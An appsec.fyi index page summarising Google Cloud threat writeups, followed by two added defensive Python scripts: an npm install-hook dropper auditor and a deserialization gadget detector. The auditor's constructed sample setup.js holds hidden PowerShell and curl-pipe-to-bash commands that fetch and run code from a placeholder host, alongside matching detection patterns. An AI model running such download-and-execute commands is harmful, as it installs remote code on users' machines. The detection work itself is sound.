appsec.fyi · Sources

7 curated AppSec resources from cloud.google.com across 5 topics on appsec.fyi.

cloud.google.com

Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-04-19.

Date Added | Resource (year, title, topic) | Excerpt

2026-04-19 | 2026 · Oracle E-Business Suite Zero-Day Exploited — Google Cloud · SSRF
    Library of techniques and analysis detailing the exploitation of Oracle E-Business Suite (EBS) by the CL0P extortion group. The campaign, which may have leveraged CVE-2025-61882 as a zero-day, was mass exploitation that chained several weaknesses (Server-Side Request Forgery, Carriage-Return Line-Feed (CRLF) injection, an authentication bypass, and XSL template injection) to reach remote code execution. The analysis covers the intrusion activity that preceded the extortion emails, the multi-stage Java implant framework, and indicators of compromise for defenders.

2026-04-16 | 2026 · DarkSword iOS Exploit Chain Adopted by Multiple Threat Actors - Google · Mobile
    Library covering detection and analysis of the DarkSword iOS exploit chain, which combines multiple zero-day vulnerabilities to compromise devices running iOS 18.4 through 18.7. It documents use of the chain by several threat actors, including UNC6748, against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine, identifies the vulnerabilities involved (among them CVE-2025-31277 and CVE-2026-20700), and names the deployed malware families GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER.

2026-04-16 | 2026 · ViewState Deserialization Zero-Day in Sitecore (CVE-2025-53690) · Deser
    Writeup of CVE-2025-53690, a ViewState deserialization zero-day affecting Sitecore deployments. Mandiant's investigation found attackers using a publicly exposed sample ASP.NET machine key, still in place in production configurations, to produce ViewState that the server accepted and deserialized, giving remote code execution. Post-exploitation involved WEEPSTEEL reconnaissance, archiving sensitive files such as `web.config`, and using EARTHWORM, DWAGENT, and SHARPHOUND for network tunneling, remote access, and Active Directory enumeration, culminating in privilege escalation and lateral movement over RDP.

2026-04-11 | 2026 · DPRK Threat Actor Compromises Axios NPM Package · Supply Chain
    Library analyzing a North Korea-nexus threat actor's compromise of the popular "axios" NPM package. The attacker introduced a malicious dependency, "plain-crypto-js", an obfuscated dropper for the WAVESHAPER.V2 backdoor on Windows, macOS, and Linux. The dropper runs from a `postinstall` hook and uses OS-specific PowerShell, curl, and bash stages to download and execute a per-platform payload aimed at reconnaissance and command execution. GTIG attributes the activity to the financially motivated UNC1069, citing infrastructure overlaps and the evolution of the WAVESHAPER backdoor.

2026-04-10 | 2026 · 2025 Zero-Days in Review: Lessons Learned · RCE
    Survey of zero-days exploited in 2025, showing a continued shift toward enterprise targets: 48% of tracked vulnerabilities affected enterprise software and edge devices. State-sponsored espionage groups, particularly those linked to the People's Republic of China (PRC) such as UNC5221 and UNC3886, favored these technologies for initial network access, while commercial surveillance vendors also expanded their exploit chain development. Campaigns involving malware such as BRICKSTORM illustrated a newer pattern of using stolen intellectual property for long-term zero-day development.

2026-04-10 | 2026 · Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) · RCE
    Writeup detailing exploitation of CVE-2025-55182 ("React2Shell"), a critical RCE in React Server Components, by multiple threat actors including China-nexus espionage groups; the actors named are UNC6600, UNC6586, UNC6588, and UNC6603. Observed payloads include the MINOCAT, SNOWLIGHT, HISONIC, and COMPOOD backdoors and XMRIG miners. The writeup covers the exploitation chains and post-compromise behavior of each actor, and addresses misinformation around the initial exploit disclosures: a GitHub repository first published non-functional, AI-generated exploit code and was later updated with working, obfuscated samples.

2026-04-03 | 2026 · Now You Serial, Now You Don't — Systematically Hunting for Deserialization Exploits | Google Cloud · Deser
    Library for hunting deserialization exploits, built around HeySerial.py (rule generation) and CheckYoself.py (rule validation). It details the systematic research process behind the tools, which derive detection rules from the gadget chains and payload structure of public exploits, enabling detection of exploitation attempts against Exchange (CVE-2021-42321), Zoho ManageEngine (CVE-2020-10189), Jira (CVE-2020-36239), Telerik (CVE-2019-18935), Jenkins (CVE-2016-9299), and log4j (CVE-2021-44228).
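The `postinstall` dropper described in the axios / "plain-crypto-js" entry is a pattern you can hunt for in your own dependency tree before the package ever runs. The script below is an added example written for this page, not code from the GTIG report, from appsec.fyi, or from the axios project. It audits npm lifecycle hooks and, when a hook is just `node something.js`, scans the referenced file as well, since droppers keep the logic out of the one-line hook. The package names `safe-lib` and `evil-helper`, the `setup.js` body, the placeholder URL and the indicator regexes are constructed assumptions and do not reproduce the real malicious package.

```python
"""Audit npm lifecycle scripts for download-and-execute droppers (added example).

Sample packages created by demo() are constructed and hypothetical; indicator
patterns are assumptions about what an OS-switching dropper looks like.
"""
import json
import os
import re
import shutil
import tempfile

# Hooks npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for the behaviour in the report: pick a platform, fetch a stage, run it.
INDICATORS = {
    "powershell_download": re.compile(
        r"powershell(\.exe)?\b.*(-enc|iwr|Invoke-WebRequest|DownloadString|IEX)", re.I),
    "curl_pipe_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "remote_url": re.compile(r"https?://", re.I),
    "inline_exec": re.compile(r"\bnode\s+-e\b|\beval\(|child_process|execSync"),
    "platform_switch": re.compile(r"process\.platform|os\.platform\(\)|\buname\b|\$\{?OSTYPE"),
}


def indicators_in(text: str) -> list:
    """Names of every indicator pattern that matches the text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def audit_package(pkg: dict, pkg_dir: str = "") -> list:
    """Findings for one parsed package.json; with pkg_dir, `node x.js` hooks are followed."""
    findings = []
    scripts = pkg.get("scripts") or {}
    name = pkg.get("name", "?")
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = indicators_in(cmd)
        if hits:
            findings.append({"package": name, "hook": hook, "source": "package.json",
                             "command": cmd, "indicators": hits})
        if not pkg_dir:
            continue
        for m in re.finditer(r"\bnode\s+([\w./-]+\.[cm]?js)\b", cmd):
            script = os.path.join(pkg_dir, m.group(1))
            if not os.path.isfile(script):
                continue
            with open(script, encoding="utf-8", errors="replace") as fh:
                hits = indicators_in(fh.read())
            if hits:
                findings.append({"package": name, "hook": hook, "source": m.group(1),
                                 "command": cmd, "indicators": hits})
    return findings


def scan_node_modules(root: str) -> list:
    """Walk an installed tree and audit every package.json found."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                pkg = json.load(fh)
            except json.JSONDecodeError:
                continue
        findings.extend(audit_package(pkg, dirpath))
    return findings


# Constructed dropper stub (hypothetical; the URL is a placeholder, not a real C2).
SAMPLE_SETUP_JS = """\
const { execSync } = require("child_process");
const base = "https://updates.example.invalid/stage2";
if (process.platform === "win32") {
  execSync(`powershell -NoP -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('${base}/w')"`);
} else {
  execSync(`curl -fsSL ${base}/u | bash`);
}
"""


def demo() -> list:
    """Build a throwaway node_modules with one clean and one dropper-like package, scan it."""
    root = tempfile.mkdtemp(prefix="npm-audit-")
    try:
        pkgs = {
            "safe-lib": {"name": "safe-lib", "version": "1.0.0", "scripts": {"test": "jest"}},
            "evil-helper": {"name": "evil-helper", "version": "0.0.3",
                            "scripts": {"postinstall": "node setup.js"}},
        }
        for dirname, pkg in pkgs.items():
            d = os.path.join(root, "node_modules", dirname)
            os.makedirs(d)
            with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as fh:
                json.dump(pkg, fh)
        with open(os.path.join(root, "node_modules", "evil-helper", "setup.js"), "w",
                  encoding="utf-8") as fh:
            fh.write(SAMPLE_SETUP_JS)
        return scan_node_modules(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['package']}: {f['hook']} via {f['source']} -> {', '.join(f['indicators'])}")
```

Run `scan_node_modules("node_modules")` against a freshly installed tree, or better, against the tarballs in a lockfile before `npm ci` runs them. A single `remote_url` hit is weak on its own (plenty of honest packages print a URL); `curl_pipe_shell` or `powershell_download` inside an install hook is the signal worth a block. Installing with `npm ci --ignore-scripts` and then running only the hooks you have reviewed removes the window entirely.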
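The Sitecore ViewState entry and the HeySerial entry above reduce to the same detection question: does a request parameter decode to a serialized object, and does that object name a type from a known gadget chain? The block below is an added example for this page; it is not HeySerial.py or CheckYoself.py and not Mandiant's or appsec.fyi's code. It identifies the serializer from the stream header (Java `ObjectOutputStream`, .NET `BinaryFormatter`, ASP.NET `LosFormatter` ViewState) and searches the decoded bytes for gadget type names. The sample request is constructed: the Java blob carries a CommonsCollections class name but is not a working chain, and the ViewState blob is a dummy stream.

```python
"""Flag request parameters carrying serialized objects with gadget-chain markers (added example).

SAMPLE_PARAMS is constructed, not a real capture; the gadget marker list is a
small illustrative subset of public ysoserial / ysoserial.net chains.
"""
import base64
import binascii
import zlib

# Leading bytes that identify the serializer.
JAVA_MAGIC = b"\xac\xed\x00\x05"                                              # java.io.ObjectOutputStream
DOTNET_BINARY_MAGIC = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"  # BinaryFormatter header
DOTNET_LOS_MAGIC = b"\xff\x01"                                                # LosFormatter (ViewState)

# Type names characteristic of public gadget chains.
GADGET_MARKERS = (
    b"org.apache.commons.collections.functors.InvokerTransformer",
    b"org.apache.commons.collections4.functors.InvokerTransformer",
    b"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    b"org.codehaus.groovy.runtime.ConvertedClosure",
    b"System.Windows.Data.ObjectDataProvider",
    b"Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties",
    b"System.Windows.Markup.XamlReader",
)


def decode_candidate(value: str):
    """Base64-decode a parameter (standard or URL-safe alphabet), gunzip if wrapped; None if not base64."""
    raw = value.strip()
    raw += "=" * (-len(raw) % 4)
    try:
        data = base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        try:
            data = base64.urlsafe_b64decode(raw)
        except (binascii.Error, ValueError):
            return None
    if data.startswith(b"\x1f\x8b"):  # gzip-wrapped Java streams are common in the wild
        try:
            data = zlib.decompress(data, 16 + zlib.MAX_WBITS)
        except zlib.error:
            pass
    return data


def classify(data: bytes) -> dict:
    """Identify the serializer from its header and look for gadget-chain type names."""
    if data.startswith(JAVA_MAGIC):
        fmt = "java"
    elif data.startswith(DOTNET_BINARY_MAGIC):
        fmt = "dotnet-binaryformatter"
    elif data.startswith(DOTNET_LOS_MAGIC):
        fmt = "dotnet-viewstate"
    else:
        fmt = None
    gadgets = [m.decode() for m in GADGET_MARKERS if m in data]
    if gadgets:
        verdict = "block"      # serialized stream naming a known gadget type
    elif fmt:
        verdict = "inspect"    # serialized object with no known gadget: log and review
    else:
        verdict = "ignore"
    return {"format": fmt, "gadgets": gadgets, "verdict": verdict}


def scan_request_params(params: dict) -> dict:
    """Verdicts for every parameter that decodes to a serialized object."""
    results = {}
    for name, value in params.items():
        data = decode_candidate(value)
        if data is None:
            continue
        result = classify(data)
        if result["verdict"] != "ignore":
            results[name] = result
    return results


# Constructed request: a harmless-looking ViewState, a plain search term, and a Java
# blob whose class descriptor names a CommonsCollections gadget (not a working chain).
SAMPLE_PARAMS = {
    "__VIEWSTATE": base64.b64encode(DOTNET_LOS_MAGIC + b"\x0f\x05\x02Home").decode(),
    "q": "search terms",
    "data": base64.b64encode(
        JAVA_MAGIC + b"\x73\x72\x00\x3a"
        + b"org.apache.commons.collections.functors.InvokerTransformer" + b"\x00" * 8
    ).decode(),
}

if __name__ == "__main__":
    for name, result in scan_request_params(SAMPLE_PARAMS).items():
        print(name, result)
```

Two caveats matter for the Sitecore case. A ViewState forged with the leaked machine key carries a valid MAC, so ASP.NET's own validation accepts it; only content inspection of this kind, or host-side hunting (w3wp.exe spawning cmd.exe or powershell.exe, the WEEPSTEEL and tunneling artifacts the writeup lists), will catch it. And when `viewStateEncryptionMode` is on, the wire bytes are opaque, so the check has to run where the framework decrypts, or you fall back to the host-side signals and to rotating the key.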